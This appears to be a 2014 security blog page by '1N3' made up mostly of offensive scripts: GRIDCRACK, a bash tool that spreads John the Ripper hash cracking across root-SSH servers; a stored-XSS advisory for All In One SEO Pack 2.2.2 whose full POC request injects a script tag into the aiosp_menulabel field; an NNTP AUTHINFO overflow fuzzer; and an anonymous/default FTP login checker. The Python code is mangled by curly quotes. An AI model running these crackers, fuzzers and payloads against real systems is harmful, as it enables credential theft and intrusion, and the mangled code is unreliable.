#!/bin/bash
# GRIDCRACK v20140822 by 1N3 @ http://xerosecurity.com
#
# USAGE: ./gridcrack <crack/status/setup> <format>
#
# ABOUT:
# GRIDCRACK is a Linux grid based password cracker used to leverage multiple servers to crack a single hash file.
#
# REQUIREMENTS:
# 1) Two or more Linux based servers running John The Ripper (john)
# 2) root SSH keys setup for automatic login/authentication via SSH keys
# 3) A large masterlist dictionary file to split amongst the configured nodes
#
# HOW IT WORKS:
# Running ./gridcrack setup will launch the initial setup of gridcrack which will prompt for the masterlist.dic file (a large wordlist of your choice..).
# From there, it will proceed to split the file into equal parts based on the number of configured nodes in this script (NUM_NODES). Next, It will transfer
# the individual parts of the split wordlist to each host via SCP. From here, the user can copy/paste their hashes into the hashes.txt (/pentest/gridcrack/hashes.txt)
# and run the appropriate command to begin the brute force attack (ie. ./gridcrack crack NT). From here, gridcrack will first copy the hashes.txt to each node first,
# then proceed to run john on each node simultaneously using the format specified (ie. NT). Results are then displayed back to the central server as
# each node finishes. A status mode is also included to show the status of john on each node (ie. ./gridcrack status NT).
#
#
# STATIC VARS
# FILL THIS OUT PRIOR TO RUNNING GRIDCRACK...
NUM_NODES=""
NODE1=""
NODE2=""
NODE3=""
GRIDCRACK_HOME=""
# CRACK MODE
if [ "$1" == "crack" ]
then
if [ -z "$2" ]
then
echo "Format not set. Use ./gridcrack crack <format> to set it..."
exit 1
else
FORMAT="$2"
# TRANSFER HASHES TO EACH NODE
echo "Transferring hashes to each node..."
if [ "$NODE1" ]
then
scp $GRIDCRACK_HOME/hashes.txt root@$NODE1:$GRIDCRACK_HOME 2> /dev/null
fi
if [ "$NODE2" ]
then
scp $GRIDCRACK_HOME/hashes.txt root@$NODE2:$GRIDCRACK_HOME 2> /dev/null
fi
if [ "$NODE3" ]
then
scp $GRIDCRACK_HOME/hashes.txt root@$NODE3:$GRIDCRACK_HOME 2> /dev/null
fi
# START CRACKING ON EACH NODE
echo "Starting crack mode on each node..."
if [ "$NODE1" ]
then
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xaa -format=$FORMAT 2> /dev/null && ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show &
fi
if [ "$NODE2" ]
then
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xab --format=$FORMAT 2> /dev/null && ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show &
fi
if [ "$NODE3" ]
then
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --wordlist=$GRIDCRACK_HOME/wordlists/xac --format=$FORMAT 2> /dev/null && ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show &
fi
fi
# SHOW STATUS
elif [ "$1" == "status" ]
then
if [ -z "$2" ]
then
echo "Format not set. Use ./gridcrack status <format> to set it..."
exit 1
else
FORMAT="$2"
echo "Checking status..."
if [ "$NODE1" ]
then
echo "#### NODE1:"
ssh root@$NODE1 ps -ef | grep john | grep hashes
ssh root@$NODE1 john $GRIDCRACK_HOME/hashes.txt -format=$FORMAT --show
fi
if [ "$NODE2" ]
then
echo "#### NODE2:"
ssh root@$NODE2 ps -ef | grep john | grep hashes
ssh root@$NODE2 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show
fi
if [ "$NODE3" ]
then
echo "#### NODE3:"
ssh root@$NODE3 ps -ef | grep john | grep hashes
ssh root@$NODE3 john $GRIDCRACK_HOME/hashes.txt --format=$FORMAT --show
fi
fi
# RUN SETUP
elif [ "$1" == "setup" ]
then
echo "################"
echo "Running setup..."
echo "################"
echo ""
echo "Enter full name and path to masterlist.dic...(ie. /pentest/gridcrack/wordlists/masterlist.dic)"
read MASTERLIST
MASTERLIST_LINES=`wc -l $MASTERLIST | awk '{print $1}'`
MASTERLIST_LINES=`expr $MASTERLIST_LINES / $NUM_NODES`
cd $GRIDCRACK_HOME/wordlists/
echo "Splitting wordlists... this could take a few minutes..."
split -l $MASTERLIST_LINES $MASTERLIST
ls -lh $GRIDCRACK_HOME/wordlists/
if [ "$NODE1" ]
then
echo "Creating directory structure on $NODE1..."
ssh root@$NODE1 mkdir $GRIDCRACK_HOME/wordlists/ -p
scp $GRIDCRACK_HOME/wordlists/xaa root@$NODE1:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
fi
if [ "$NODE2" ]
then
ssh root@$NODE2 mkdir $GRIDCRACK_HOME/wordlists/ -p
scp $GRIDCRACK_HOME/wordlists/xab root@$NODE2:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
fi
if [ "$NODE3" ]
then
ssh root@$NODE3 mkdir $GRIDCRACK_HOME/wordlists/ -p
scp $GRIDCRACK_HOME/wordlists/xac root@$NODE3:$GRIDCRACK_HOME/wordlists/ 2> /dev/null
fi
# SHOW HELP SCREEN
elif [ "$1" == "-h" ]
then
echo "************* GRIDCRACK by 1N3 ********************"
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"
echo "************* http://xerosecurity.com *************"
else
echo "************* GRIDCRACK by 1N3 ********************"
echo "Usage: ./gridcrack.sh <crack/status/setup> <format>"
echo "************* http://xerosecurity.com *************"
fi
Friday, August 22, 2014
Wednesday, August 13, 2014
All In One SEO Pack v.2.2.2 Stored XSS
Author: 1N3
Website: http://xerosecurity.com
Vender Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
ABOUT:
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. A malicious author or admin of a site could use this flaw to secretly redirect users of a site to a malicious site or steal session cookies of other users.
NOTE: User must have the ability to publish pages in the affected Wordpress site (usually Author or Admin roles required).
POC:
http://localhost/wordpress/wp-admin/post.php?post_type=page
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/wordpress/wp-admin/post-new.php?post_type=page
Cookie=wp-saving-post-107=check; wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C5eb50362019f43eae995f2e48c5227f4; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1407939753; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C0a5ac5bc9c15db1b47d703678928b5be; PHPSESSID=oibbnvob8bp761ep58hlijji23; bp-activity-oldestpage=1
Content-Type=application/x-www-form-urlencoded
Content-Length=1856
POSTDATA=_wpnonce=6da01af260&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=page&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&auto_draft=&post_ID=107&meta-box-order-nonce=a33dd2a867&closedpostboxesnonce=e5ec4ba0bf&post_title=XSS2&samplepermalinknonce=12c1ea009d&content=XSS2&mobile_template_box_nonce=704c3cc317&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&wptouch_mobile_page_template=Default+Template&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=13&aa=2014&hh=10&mn=29&ss=11&hidden_mm=08&cur_mm=08&hidden_jj=13&cur_jj=13&hidden_aa=2014&cur_aa=2014&hidden_hh=10&cur_hh=10&hidden_mn=29&cur_mn=29&original_publish=Publish&publish=Publish&parent_id=&page_template=default&menu_order=0&yoast_wpseo_focuskw=&yoast_wpseo_title=&yoast_wpseo_metadesc=&yoast_wpseo_meta-robots-noindex=0&yoast_wpseo_sitemap-include=-&yoast_wpseo_sitemap-prio=-&yoast_wpseo_sitemap-html-include=-&yoast_wpseo_authorship=-&yoast_wpseo_canonical=&yoast_wpseo_redirect=&yoast_wpseo_opengraph-description=&yoast_wpseo_opengraph-image=&yoast_wpseo_google-plus-description=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=85af917bd6&advanced_view=1&comment_status=open&ping_status=open&post_name=&post_author_override=1&aiosp_edit=aiosp_edit&nonce-aioseop-edit=d33cea6040&aiosp_title=&length1=0&aiosp_description=&length2=0&aiosp_keywords=&aiosp_titleatr=&aiosp_menulabel=%3Cscript%3Ealert%288%29%3B%3C%2Fscript%3E
Tuesday, August 12, 2014
Network News Transfer Protocol (NNTP) Fuzzer
#!/usr/bin/python
# Network News Transport Protocol Fuzzer by 1N3 v20140802
# http://xerosecurity.com
#
# USAGE: NTTP_fuzz.py <IP/host> <port>
#
#HELP
#100 Supported Commands
# MODE READER
# AUTHINFO USER <username>
# AUTHINFO PASS <password>
# LIST <active|newsgroups|overview.fmt> <pattern>
# XGTITLE <pattern>
# GROUP <newsgroup>
# LISTGROUP <newsgroup>
# NEWGROUPS <yy><yymmdd> <hhmmss>
# OVER <range|msgid>
# XOVER <range|msgid>
# XHDR <header> <range|msgid>
# XPAT <header> <range|msgid> <pattern> <pattern..>
# NEWNEWS <newsgroup> <yymmdd> <hhmmss> <gmt|utc>
# STAT <msgid|number>
# HEAD <msgid|number>
# BODY <msgid|number>
# ARTICLE <msgid|number>
# POST
# NEXT
# LAST
# HELP
# DATE
# QUIT
import socket
import time
import sys, getopt
def main(argv):
argc = len(argv)
if argc <= 1:
print “usage: %s <host>” % (argv[0])
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # CREATE SOCKET
buffer = ["X"] # BUFFER “X”
counter = 100 # START VALUE
target = argv[1] # SET TARGET
port = “119″ # SET PORT
while (len(buffer)) <= 10000: # END VALUE
buffer=”X”*counter
counter=counter+100 # MULTIPLIER
print “(–==== Fuzzing ” + target + “:” + port + ” with length:” +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,int(port)))
data = s.recv(1024)
#print “CONNECTION: ” +data
s.send(‘AUTHINFO USER ‘ + buffer + ‘\r\n’)
data = s.recv(1024)
#print “received: ” +data
s.send(‘AUTHINFO PASS ‘ + buffer + ‘\r\n’)
data = s.recv(1024)
print “received: ” +data
s.close()
#time.sleep(3)
# print “\n”.join(sys.argv)
main(sys.argv)
Anonymous FTP Login Checker
#!/usr/bin/python
# Anonymous FTP login checker by 1N3 v20140805
# http://xerosecurity.com
#
# ABOUT:
# This script checks the remote host for anonymous FTP accounts enabled.
import socket
import time
import sys, getopt
def main(argv):
argc = len(argv)
if argc <= 1:
print “usage: %s <host>” % (argv[0])
sys.exit(0)
print “(–==== Checking anonymous FTP login…\n”
users=["anonymous","admin","ftp","administrator","guest"]
target = argv[1] # SET TARGET
for user in users:
print “(–==== Checking user: ” +user
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,21))
data = s.recv(1024)
s.send(‘USER ‘ +user+ ‘\r\n’)
data = s.recv(1024)
s.send(‘PASS ‘ +user+ ‘\r\n’)
data = s.recv(1024)
print data
s.send(‘QUIT’ +’\r\n’)
s.close()
main(sys.argv)
Subscribe to:
Posts (Atom)